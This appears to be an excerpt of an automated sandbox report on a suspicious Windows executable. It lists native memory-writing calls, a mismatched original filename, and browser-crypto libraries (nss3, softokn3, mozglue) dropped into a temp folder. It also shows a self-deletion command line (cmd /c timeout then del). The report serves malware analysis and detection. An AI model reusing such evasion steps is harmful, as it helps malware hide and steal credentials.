Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402FA3	0_2_00402FA3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02308A39	0_2_02308A39
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230A6D8	0_2_0230A6D8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023063AE	0_2_023063AE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300805	0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023068AF	0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023010C6	0_2_023010C6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023065E5	0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300A18	0_2_02300A18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230661A	0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02301671	0_2_02301671
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230164B	0_2_0230164B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02308EBC	0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02301682	0_2_02301682
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300A84	0_2_02300A84
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230328E	0_2_0230328E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300AF6	0_2_02300AF6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300AE9	0_2_02300AE9
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02302EED	0_2_02302EED
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023036C0	0_2_023036C0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023096CC	0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023086CF	0_2_023086CF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02302333	0_2_02302333
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02308F16	0_2_02308F16
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02306300	0_2_02306300
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230A706	0_2_0230A706
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305378	0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02306B64	0_2_02306B64
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230175D	0_2_0230175D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300B5F	0_2_02300B5F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304787	0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02306BDD	0_2_02306BDD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300000	0_2_02300000
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02302003	0_2_02302003
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02302C09	0_2_02302C09
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230286C	0_2_0230286C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02301050	0_2_02301050
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023058B2	0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023050A2	0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023030AB	0_2_023030AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023014AB	0_2_023014AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230589A	0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230948E	0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023010E7	0_2_023010E7
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023054DA	0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023044DE	0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304D35	0_2_02304D35
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230253A	0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230593D	0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02303519	0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02309173	0_2_02309173
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230596A	0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230195E	0_2_0230195E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304147	0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304981	0_2_02304981
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02309D83	0_2_02309D83
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02301588	0_2_02301588
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023099FF	0_2_023099FF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023045E0	0_2_023045E0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023009CF	0_2_023009CF

Contains functionality to call native functions

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02308A39 NtWriteVirtualMemory,LoadLibraryA,	0_2_02308A39
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02300805 EnumWindows,NtWriteVirtualMemory,	0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023068AF NtWriteVirtualMemory,LoadLibraryA,	0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230A1F4 NtProtectVirtualMemory,	0_2_0230A1F4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023065E5 NtAllocateVirtualMemory,	0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230661A NtAllocateVirtualMemory,	0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02308EBC NtWriteVirtualMemory,LoadLibraryA,	0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305AF2 NtWriteVirtualMemory,	0_2_02305AF2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305B18 NtWriteVirtualMemory,	0_2_02305B18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305378 NtWriteVirtualMemory,	0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305BB4 NtWriteVirtualMemory,	0_2_02305BB4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02304787 NtWriteVirtualMemory,	0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305B8E NtWriteVirtualMemory,	0_2_02305B8E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305BDB NtWriteVirtualMemory,	0_2_02305BDB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305C2F NtWriteVirtualMemory,	0_2_02305C2F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305C7C NtWriteVirtualMemory,	0_2_02305C7C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02305C55 NtWriteVirtualMemory,	0_2_02305C55
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023058B2 NtWriteVirtualMemory,	0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023050A2 NtWriteVirtualMemory,	0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230589A NtWriteVirtualMemory,	0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230948E NtWriteVirtualMemory,	0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023054DA NtWriteVirtualMemory,	0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023044DE NtWriteVirtualMemory,	0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230253A NtWriteVirtualMemory,	0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230593D NtWriteVirtualMemory,	0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02303519 NtWriteVirtualMemory,LoadLibraryA,	0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0230596A NtWriteVirtualMemory,	0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_023045E0 NtWriteVirtualMemory,	0_2_023045E0

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe

Process Stats: CPU usage > 98%

PE file does not import any functions

Source: api-ms-win-core-string-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.17.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.17.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: X4lLneI8ZK.exe, 00000000.00000000.332931513.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe	Binary or memory string: OriginalFilename vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameucrtbase.dllj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamenssdbm3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000000.613888707.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe	Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe

Section loaded: crtdll.dll

Source: unknown	Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: C:\Users\user\Desktop\X4lLneI8ZK.exe 'C:\Users\user\Desktop\X4lLneI8ZK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c C:\Windows\system32\timeout.exe 3 & del 'X4lLneI8ZK.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A7A74107-99A69D1E-ADF8610F1

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00403A43 push eax; ret	0_2_00403A44
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040546D push ebp; retf	0_2_0040546E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00403C03 push edi; iretd	0_2_00403C04
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00404CF9 push ds; iretd	0_2_00404CFD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_004079F7 push ebx; iretd	0_2_004079F8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02181E33 push edx; ret	0_2_02181E61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02180218 push edx; ret	0_2_02180241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02184A13 push edx; ret	0_2_02184A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02183213 push edx; ret	0_2_02183241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02181A13 push edx; ret	0_2_02181A41
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02186214 push edx; ret	0_2_02186241
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02185A03 push edx; ret	0_2_02185A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02181205 push edx; ret	0_2_02181231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02182A07 push edx; ret	0_2_02182A31
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02184207 push edx; ret	0_2_02184231
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02184233 push edx; ret	0_2_02184261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02182A33 push edx; ret	0_2_02182A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02181233 push edx; ret	0_2_02181261
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02185A33 push edx; ret	0_2_02185A61
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02183A24 push edx; ret	0_2_02183A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02182224 push edx; ret	0_2_02182251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02180A24 push edx; ret	0_2_02180A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02186A24 push edx; ret	0_2_02186A51
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02185225 push edx; ret	0_2_02185251
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02180A58 push edx; ret	0_2_02180A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02185253 push edx; ret	0_2_02185281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02183A54 push edx; ret	0_2_02183A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02182254 push edx; ret	0_2_02182281
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02186A54 push edx; ret	0_2_02186A81
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02180248 push edx; ret	0_2_02180271
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_02184A44 push edx; ret	0_2_02184A71

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
